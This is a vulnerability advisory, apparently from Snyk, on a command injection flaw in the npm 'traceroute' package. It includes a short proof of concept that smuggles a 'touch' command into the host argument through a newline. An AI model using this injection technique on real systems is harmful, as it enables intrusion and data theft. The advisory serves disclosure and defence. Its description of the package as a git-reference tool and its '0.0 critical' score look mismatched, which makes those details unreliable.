Shell Command Injection Affecting traceroute package, versions <=1.0.0


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Scope Changed
    Confidentiality High
    Integrity High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 3.83% (92nd percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID npm:traceroute:20160311
  • published 23 Jan 2018
  • disclosed 9 Nov 2017
  • credit Dor Dali

How to fix?

There currently is no fixed version for traceroute. A fix is on the master branch but was not published to npm.

Overview

traceroute is an npm package used for listing references in a remote git repository.

Affected versions of this package are vulnerable to Arbitrary Command Injection due to the insecure use of exec. An attacker can add a newline %0a after the host addr, and inject malicious shell commands to disrupt server operation or obtain sensitive information.

PoC by Dor Dali

traceroute = require('traceroute');

host = '127.0.0.1\ntouch /tmp/malicious';

traceroute.trace(host, function (err,hops) { // the file /tmp/malicious was created console.log(hops); });